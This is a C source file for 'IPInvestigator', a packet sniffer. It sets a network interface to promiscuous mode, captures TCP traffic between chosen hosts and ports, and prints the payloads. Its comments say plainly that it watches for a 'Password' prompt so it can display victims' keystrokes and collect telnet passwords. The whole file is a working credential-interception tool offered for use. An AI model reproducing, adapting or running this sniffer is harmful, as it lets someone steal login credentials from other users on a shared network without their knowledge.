#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <linux/if_ether.h>
#include <linux/if.h>
#include "find.h"

/*
 * IPInvestigator - 
 *    written by, Jeff Thompson (jwthomp@uiuc.edu)
 *        no value implied.
 */

struct ifreq oldifr, ifr;


main(int argc, char *argv[])
{
int l, i, j;
int sock, length;
struct sockaddr_in name;
unsigned char buf[4096];
unsigned int feh;
int size;
int flag = 0;
int ip[4];
int ip2[4];
int inport, outport;
char DEV[255];

if(argc < 12)
  {
  printf("%s: Ethdevice SourceIPWithSpacesNotDots DestIPWithSpacesNotDots sourceport destport\n", argv[0]);
  exit(1);
  }

/* 
 * Obtain ip and port from command line
 */
strcpy(DEV, argv[1]);
ip[0] = atoi(argv[2]);
ip[1] = atoi(argv[3]);
ip[2] = atoi(argv[4]);
ip[3] = atoi(argv[5]);
ip2[0] = atoi(argv[6]);
ip2[1] = atoi(argv[7]);
ip2[2] = atoi(argv[8]);
ip2[3] = atoi(argv[9]);
inport = atoi(argv[10]);
outport = atoi(argv[11]);

/* 
 * Get a socket which will collect all packets
 */
sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));

if (sock < 0) 
    {
    printf("Cannot open Raw ICMP Socket.\n");
    exit(1);
    }

/* 
 * Configure ethernet device
 */
strcpy(ifr.ifr_name, DEV);
strcpy(oldifr.ifr_name, DEV);

/*
 * Get flags and place them in ifr structure
 */
if(ioctl(sock, SIOCGIFFLAGS, &ifr) < 0)
  {
  printf("Unable to get %s flags\n", DEV);
  exit(1);
  }

/*
 * Get flags and place them in oldifr structure
 *   This will be used later to change ether device characteristics back
 *   to their original value
 */
if(ioctl(sock, SIOCGIFFLAGS, &oldifr) < 0)
  {
  printf("Unable to get %s flags\n", DEV);
  exit(1);
  }

/*
 * Set the promiscous flag
 */
ifr.ifr_flags |= IFF_PROMISC;

/*
 * Set the device flags
 */
if(ioctl(sock, SIOCSIFFLAGS, &ifr) < 0)
  {
  printf("Unable to set %s flags\n", DEV);
  exit(1);
  } 

/*
 * Set up sockaddr
 */
name.sin_family = AF_INET;
name.sin_addr.s_addr = INADDR_ANY;
name.sin_port = 0;

length = sizeof(name);

if (getsockname(sock, (struct sockaddr *) &name, &length) < 0)
    {
    printf("Error: Can't get socket name\n");
    exit(1);
    }

printf("Up and running. Collect them NFO'Z\n");
feh = sizeof(struct sockaddr);

/*
 * Entering the data collection loop
 */
for( ; ; )
    {
    if ((l = recvfrom(sock, buf, 1024, 0, (struct sockaddr *)&name, 
                      &feh)) < 0)
        printf("Error receiving ICMP packet\n");

/* 
 * This slows things way down as the find algorithm is rather slow
 *    If you wish to display faster for whatever reason then just comment
 *    this line.  
 * flag is a boolean which if set to true will print someones keypresses
 *    as well as the echo from the telnetd.  This allows the viewing of,
 *    hmmm, passwords...
 */
if(Find(buf, "Password", l))
    flag = 1;

/* 
 * Check to make sure this is an IP packet
 *  The number starts high as the ethernet frame is in the buffer as well.
 */
if(buf[14] == 0x45 || buf[14] == 0x54) 
  /*
   * Verify that it is protocol 6.
   */
  if(buf[23] == 6)
if(flag == 1)
  {
/* 
 * Verify that ip addresses and ports match.  
 */
  if( ((buf[26] == (ip[0] & 0xff)) && (buf[27] == (ip[1] & 0xff)) && 
       (buf[28] == (ip[2] & 0xff)) && (buf[29] == (ip[3] & 0xff)) &&
       ((buf[34] * 256 + buf[35]) == inport)) 
   && ((buf[30] == (ip2[0] & 0xff)) && (buf[31] == (ip2[1] & 0xff)) &&
       (buf[32] == (ip2[2] & 0xff)) && (buf[33] == (ip2[3] & 0xff)) &&
       ((buf[36] * 256 + buf[37]) == outport)))
    {
/*
 * buf[16] and buf[17] are the total length of the ip packet
 * 54 is the data offset to reach the data segment of the buffer
 * 40 is subtracted as this is the length of the IP header and TCP header
 */
    size = buf[16] * 256 + buf[17];
    size = 54 + size - 40;
    for(i = 54; i < size; i++)
      printf("%c", buf[i]);
/*
 * Set the flag back to 0 after a \n is found
 */
    if(flag == 1 && buf[i] == '\n')
      flag = 0;
    }
  }
else
  if( ((buf[26] == (ip[0] & 0xff)) && (buf[27] == (ip[1] & 0xff)) && 
       (buf[28] == (ip[2] & 0xff)) && (buf[29] == (ip[3] & 0xff)) &&
       ((buf[34] * 256 + buf[35]) == inport)) 
   && ((buf[30] == (ip2[0] & 0xff)) && (buf[31] == (ip2[1] & 0xff)) &&
       (buf[32] == (ip2[2] & 0xff)) && (buf[33] == (ip2[3] & 0xff)) &&
       ((buf[36] * 256 + buf[37]) == outport)))
    {
    size = buf[16] * 256 + buf[17];
    size = 54 + size - 40;
    for(i = 54; i < size; i++)
      printf("%c", buf[i]);
    if(flag == 1 && buf[i] == '\n')
      flag = 0;
    }

fflush(stdout);


    }

close(sock);
exit(0);
}

